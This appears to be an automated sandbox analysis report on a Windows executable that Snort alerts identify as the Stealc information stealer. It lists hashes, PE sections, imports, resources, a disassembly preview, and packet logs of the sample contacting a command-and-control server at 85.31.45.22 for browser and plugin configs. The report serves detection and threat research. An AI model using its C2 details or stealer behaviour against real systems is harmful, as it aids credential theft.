Preview:	ZBEDCJPBEYDZQGCVTGMBDASCMXWLERZBJTKXMSCERSGFDONQAMYGDFYKFYLRRNDSSGOWCSVJIWIVRJNDSQXJTTMAXVCSRDVBHJTJAHTUGCUAWHWEVTZMXBFFYFUVEYDCLBXZZXFGQTWOJCECEYXZGEOOJDMVGMJIBYUFGTAXZQFDALIISPEXNBMVCNQHJOUZVXMSFGVMMJSOTYBAIBARXRQIHGTHEJLHLQYVFLCLOFZPJJNGWGUFEFWDITXPCXBOEGYNGVEMPRSJBIUABRWYDIZIOEKFMGKERRXNEAUHHIGKJGZYYHOPIKNRRYEAZLMNYDGFIVIJPYMXKETIZCKXHUZFXIJHQQDRCSLMJZZJXMQYZJYWLCENOBYZRKIPDNTOCZBITNJXYFHPKLDLFNFTFPITPPGJYNAUOBLGWYVHPFDVDMRFKRTPDBLSNIHQBPMARNFKQAQJVIEOLDVNQKQXMHUIECHHCBWWKMSQPKKMTKTWVWEBVUAXWNLNMYEUBMGCGJTOJRQFGGHHLUDCSUNVREFGQLVZNTOMRGHSGVZCIEDGKHHTKATGJQYWMOXACOPMCHXJXNTBTSGCPUUSQVNCDVHCIQKUJWVUTGDNGWDNLQEWLMNYLKNVSFDBBIZZEHCDIMOJGCOBQZDWJNJPIEFNVWHFQSCSHGUQLBIQCMTBTOMPFZRCNWPIJILMFSCYXDRTMSMAVJZZGQJTZZACHQUIBTKCMOKJBPDOKJYCHADHETFJAVZAQIIWZRRGFSBGIIPYXFQSZKQPWXQCYERZGATQXEDAHDYBYZVROOBTIZFDOMRDVIUBHXTQOKCVSRLAYYMSBYFDGLRDCLXUKSNRGYDRFKSMAJGRBMDZLACAAKDZLPQZCVGELWTWVKPXDEMWCSQNQCJWQNLMOGJVDBANJWFKRRBFXUWVSMZLFJYCUJJORXEFPORKQLYKBMUOVWZKWNAHBCKBBJIYVVDQNIPFQZUTPFKYIRDTGOBWONUYXDVC

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.017372121840178
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	B7VbZC8QLf.exe
File size:	368128
MD5:	763c3550f4e0a97baa4ebd6fc8c61996
SHA1:	6bd5ad845b130d2e4ae6b8acc08d9d782cf1276a
SHA256:	b020c34a3b2b4bc4fbfa0ac4d3ca97283e2fdce71f737e1103bd638ed8f6647a
SHA512:	159a299393dfd566451608caf0f89d833a47f3e3c95a99db614e426b7aba9af4ebd86c6c92b747f540ebe61e4441ee59780360b50e28dd0a2940763a4b4ca46f
SSDEEP:	3072:a9pgleMk/6KojuaEN9MEJApzAJ6EhzgLBSpVF8YdyTc5x/cMlFSvgwn0JV:iZ6VSyaJ6EBgLAVFe4f/ckSv
TLSH:	C0746DC253E06C60E5124732BE2FCBF82A2EBC619E557B6E23596E3F09701A3D153719
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............f.Q.f.Q.f.Q...Q.f.Q..4Q.f.Q...Q.f.Q..9Q.f.Q.f.Q.f.Q...Q.f.Q..0Q.f.Q..7Q.f.QRich.f.Q........PE..L....'@b...................

File Icon


Icon Hash:	9a861210a1a29296

Static PE Info

General

Entrypoint:	0x4040bd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x62402713 [Sun Mar 27 08:57:55 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	c3df3d0d993bdeac73a0f5fd62093e4d

Entrypoint Preview

Instruction
call 00007F2D60A8527Bh
jmp 00007F2D60A803EEh
sub eax, 000003A4h
je 00007F2D60A80584h
sub eax, 04h
je 00007F2D60A80579h
sub eax, 0Dh
je 00007F2D60A8056Eh
dec eax
je 00007F2D60A80565h
xor eax, eax
ret
mov eax, 00000404h
ret
mov eax, 00000412h
ret
mov eax, 00000804h
ret
mov eax, 00000411h
ret
mov edi, edi
push esi
push edi
mov esi, eax
push 00000101h
xor edi, edi
lea eax, dword ptr [esi+1Ch]
push edi
push eax
call 00007F2D60A814A8h
xor eax, eax
movzx ecx, ax
mov eax, ecx
mov dword ptr [esi+04h], edi
mov dword ptr [esi+08h], edi
mov dword ptr [esi+0Ch], edi
shl ecx, 10h
or eax, ecx
lea edi, dword ptr [esi+10h]
stosd
stosd
stosd
mov ecx, 00433008h
add esp, 0Ch
lea eax, dword ptr [esi+1Ch]
sub ecx, esi
mov edi, 00000101h
mov dl, byte ptr [ecx+eax]
mov byte ptr [eax], dl
inc eax
dec edi
jne 00007F2D60A80559h
lea eax, dword ptr [esi+0000011Dh]
mov esi, 00000100h
mov dl, byte ptr [eax+ecx]
mov byte ptr [eax], dl
inc eax
dec esi
jne 00007F2D60A80559h
pop edi
pop esi
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 0000051Ch
mov eax, dword ptr [00433BCCh]
xor eax, ebp
mov dword ptr [ebp-04h], eax
push ebx
push edi
lea eax, dword ptr [ebp-00000518h]
push eax
push dword ptr [esi+04h]
call dword ptr [004010D4h]
mov edi, 00000100h

Rich Headers

Programming Language:

[C++] VS2010 build 30319
[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x31ac4	0x3c	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc5000	0x15228	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x34d0	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1d4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x3156c	0x31600	False	0.22382318037974683	data	3.449168731708465	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x33000	0x9024c	0x12e00	False	0.9420659147350994	data	7.836897199525959	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.nofi	0xc4000	0x96	0x200	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc5000	0x162228	0x15400	False	0.3509420955882353	data	4.161854825673974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
BADAYESIJERICOMORIMOFU	0xd78c8	0x598	ASCII text, with very long lines (1432), with no line terminators	Sami Lappish	Finland
BADAYESIJERICOMORIMOFU	0xd78c8	0x598	ASCII text, with very long lines (1432), with no line terminators	Sami Lappish	Norway
BADAYESIJERICOMORIMOFU	0xd78c8	0x598	ASCII text, with very long lines (1432), with no line terminators	Sami Lappish	Sweden
RT_CURSOR	0xd7fc0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0
RT_CURSOR	0xd80f0	0xf0	Device independent bitmap graphic, 24 x 48 x 1, image size 0
RT_CURSOR	0xd81e0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0xc5870	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0xc5870	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0xc5870	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0xc6118	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0xc6118	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0xc6118	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0xc71e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0xc71e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0xc71e8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0xc7a90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0xc7a90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0xc7a90	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0xca038	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0xca038	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0xca038	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0xcb110	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Sami Lappish	Finland
RT_ICON	0xcb110	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Sami Lappish	Norway
RT_ICON	0xcb110	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Sami Lappish	Sweden
RT_ICON	0xcbfb8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Sami Lappish	Finland
RT_ICON	0xcbfb8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Sami Lappish	Norway
RT_ICON	0xcbfb8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Sami Lappish	Sweden
RT_ICON	0xcc860	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Sami Lappish	Finland
RT_ICON	0xcc860	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Sami Lappish	Norway
RT_ICON	0xcc860	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Sami Lappish	Sweden
RT_ICON	0xccf28	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Sami Lappish	Finland
RT_ICON	0xccf28	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Sami Lappish	Norway
RT_ICON	0xccf28	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Sami Lappish	Sweden
RT_ICON	0xcd490	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Sami Lappish	Finland
RT_ICON	0xcd490	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Sami Lappish	Norway
RT_ICON	0xcd490	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Sami Lappish	Sweden
RT_ICON	0xcfa38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Sami Lappish	Finland
RT_ICON	0xcfa38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Sami Lappish	Norway
RT_ICON	0xcfa38	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Sami Lappish	Sweden
RT_ICON	0xd0ae0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Sami Lappish	Finland
RT_ICON	0xd0ae0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Sami Lappish	Norway
RT_ICON	0xd0ae0	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Sami Lappish	Sweden
RT_ICON	0xd1468	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Sami Lappish	Finland
RT_ICON	0xd1468	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Sami Lappish	Norway
RT_ICON	0xd1468	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Sami Lappish	Sweden
RT_ICON	0xd1948	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0xd1948	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0xd1948	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0xd27f0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0xd27f0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0xd27f0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0xd2eb8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Sami Lappish	Finland
RT_ICON	0xd2eb8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Sami Lappish	Norway
RT_ICON	0xd2eb8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Sami Lappish	Sweden
RT_ICON	0xd3420	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0xd3420	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0xd3420	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0xd59c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0xd59c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0xd59c8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0xd6a70	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0xd6a70	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0xd6a70	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Sami Lappish	Sweden
RT_ICON	0xd73f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Sami Lappish	Finland
RT_ICON	0xd73f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Sami Lappish	Norway
RT_ICON	0xd73f8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Sami Lappish	Sweden
RT_STRING	0xd9580	0x4d4	data	Sami Lappish	Finland
RT_STRING	0xd9580	0x4d4	data	Sami Lappish	Norway
RT_STRING	0xd9580	0x4d4	data	Sami Lappish	Sweden
RT_STRING	0xd9a58	0x714	data	Sami Lappish	Finland
RT_STRING	0xd9a58	0x714	data	Sami Lappish	Norway
RT_STRING	0xd9a58	0x714	data	Sami Lappish	Sweden
RT_STRING	0xda170	0xb6	data	Sami Lappish	Finland
RT_STRING	0xda170	0xb6	data	Sami Lappish	Norway
RT_STRING	0xda170	0xb6	data	Sami Lappish	Sweden
RT_ACCELERATOR	0xd7f08	0x78	data	Sami Lappish	Finland
RT_ACCELERATOR	0xd7f08	0x78	data	Sami Lappish	Norway
RT_ACCELERATOR	0xd7f08	0x78	data	Sami Lappish	Sweden
RT_ACCELERATOR	0xd7e60	0xa8	data	Sami Lappish	Finland
RT_ACCELERATOR	0xd7e60	0xa8	data	Sami Lappish	Norway
RT_ACCELERATOR	0xd7e60	0xa8	data	Sami Lappish	Sweden
RT_GROUP_CURSOR	0xd9288	0x30	data
RT_GROUP_ICON	0xcb0e0	0x30	data	Sami Lappish	Finland
RT_GROUP_ICON	0xcb0e0	0x30	data	Sami Lappish	Norway
RT_GROUP_ICON	0xcb0e0	0x30	data	Sami Lappish	Sweden
RT_GROUP_ICON	0xc71c0	0x22	data	Sami Lappish	Finland
RT_GROUP_ICON	0xc71c0	0x22	data	Sami Lappish	Norway
RT_GROUP_ICON	0xc71c0	0x22	data	Sami Lappish	Sweden
RT_GROUP_ICON	0xd18d0	0x76	data	Sami Lappish	Finland
RT_GROUP_ICON	0xd18d0	0x76	data	Sami Lappish	Norway
RT_GROUP_ICON	0xd18d0	0x76	data	Sami Lappish	Sweden
RT_GROUP_ICON	0xd7860	0x68	data	Sami Lappish	Finland
RT_GROUP_ICON	0xd7860	0x68	data	Sami Lappish	Norway
RT_GROUP_ICON	0xd7860	0x68	data	Sami Lappish	Sweden
RT_VERSION	0xd92b8	0x2c8	data
None	0xd7f80	0xa	data	Sami Lappish	Finland
None	0xd7f80	0xa	data	Sami Lappish	Norway
None	0xd7f80	0xa	data	Sami Lappish	Sweden
None	0xd7f90	0xa	data	Sami Lappish	Finland
None	0xd7f90	0xa	data	Sami Lappish	Norway
None	0xd7f90	0xa	data	Sami Lappish	Sweden
None	0xd7fa0	0xa	data	Sami Lappish	Finland
None	0xd7fa0	0xa	data	Sami Lappish	Norway
None	0xd7fa0	0xa	data	Sami Lappish	Sweden
None	0xd7fb0	0xa	data	Sami Lappish	Finland
None	0xd7fb0	0xa	data	Sami Lappish	Norway
None	0xd7fb0	0xa	data	Sami Lappish	Sweden

Imports

DLL

Import

KERNEL32.dll

FindFirstFileW, EnumCalendarInfoA, _llseek, VerSetConditionMask, GetCurrentProcess, WritePrivateProfileSectionA, SetDefaultCommConfigW, InterlockedCompareExchange, WriteConsoleInputA, BackupSeek, FreeEnvironmentStringsA, GetModuleHandleW, EnumCalendarInfoExW, GetWindowsDirectoryA, EnumTimeFormatsA, EnumResourceTypesA, ActivateActCtx, GlobalAlloc, LoadLibraryW, TerminateThread, GetFileAttributesA, GetConsoleAliasW, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, SetLastError, GetProcAddress, GetFirmwareEnvironmentVariableW, EnterCriticalSection, GlobalFree, ResetEvent, OpenWaitableTimerA, LocalAlloc, SetCalendarInfoW, BuildCommDCBAndTimeoutsW, AddAtomW, SetCurrentDirectoryW, GlobalGetAtomNameW, WaitForMultipleObjects, FindNextFileA, FindFirstVolumeMountPointA, GetCPInfoExA, ReadConsoleInputW, DeleteFileW, CopyFileExA, DeleteFileA, CloseHandle, HeapSize, GetLastError, WideCharToMultiByte, GetCommandLineA, HeapSetInformation, GetStartupInfoW, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, DecodePointer, TlsFree, GetCurrentThreadId, GetCurrentThread, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, LeaveCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, HeapDestroy, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, MultiByteToWideChar, GetStringTypeW, FatalAppExitA, HeapFree, Sleep, IsProcessorFeaturePresent, GetLocaleInfoW, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, SetConsoleCtrlHandler, FreeLibrary, InterlockedExchange, HeapAlloc, HeapReAlloc, WriteConsoleW, CreateFileW

USER32.dll

LoadMenuA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Sami Lappish	Finland
Sami Lappish	Norway
Sami Lappish	Sweden

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.585.31.45.2249690802044243 03/22/23-11:21:17.410796	TCP	2044243	ET TROJAN [SEKOIA.IO] Win32/Stealc C2 Check-in	49690	80	192.168.2.5	85.31.45.22
192.168.2.585.31.45.2249691802044244 03/22/23-11:21:17.890075	TCP	2044244	ET TROJAN Win32/Stealc Requesting browsers Config from C2	49691	80	192.168.2.5	85.31.45.22
192.168.2.585.31.45.2249692802044246 03/22/23-11:21:18.044660	TCP	2044246	ET TROJAN Win32/Stealc Requesting plugins Config from C2	49692	80	192.168.2.5	85.31.45.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 22, 2023 11:21:17.382946014 CET	49690	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.410032034 CET	80	49690	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:17.410212040 CET	49690	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.410795927 CET	49690	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.480297089 CET	80	49690	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:17.835606098 CET	80	49690	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:17.835649014 CET	80	49690	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:17.835720062 CET	49690	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.835861921 CET	49690	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.836437941 CET	49690	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.847562075 CET	49691	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.862997055 CET	80	49690	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:17.874191999 CET	80	49691	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:17.874337912 CET	49691	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.890074968 CET	49691	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:17.960349083 CET	80	49691	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.012531996 CET	80	49691	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.012573004 CET	80	49691	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.012670040 CET	49691	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.012670040 CET	49691	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.014816046 CET	49691	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.016365051 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.041606903 CET	80	49691	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.042829990 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.042980909 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.044660091 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.112375021 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.175226927 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.175307035 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.175430059 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.175430059 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.175535917 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.175585985 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.175622940 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.175627947 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.175641060 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.175688982 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.177779913 CET	49692	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.204689980 CET	80	49692	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.369462013 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.396455050 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.396665096 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.397170067 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.397284985 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.424493074 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424568892 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424592018 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424606085 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424623966 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424637079 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424637079 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.424655914 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424675941 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.424707890 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.424715042 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.451281071 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.451309919 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.577368975 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.577532053 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.580290079 CET	49693	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.601923943 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.606817007 CET	80	49693	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.628645897 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.628794909 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.660377979 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.728463888 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.779143095 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.779187918 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.779335976 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.779335976 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.779638052 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.779673100 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.779735088 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.779779911 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.780205965 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.780318975 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.780334949 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.780412912 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.782058954 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.782094002 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.782133102 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.782159090 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.782211065 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.782212019 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.782278061 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.806018114 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.806065083 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.806207895 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.809438944 CET	49694	80	192.168.2.5	85.31.45.22
Mar 22, 2023 11:21:18.824353933 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.824459076 CET	80	49694	85.31.45.22	192.168.2.5
Mar 22, 2023 11:21:18.824527979 CET	80	49694	85.31.45.22	192.168.2.5
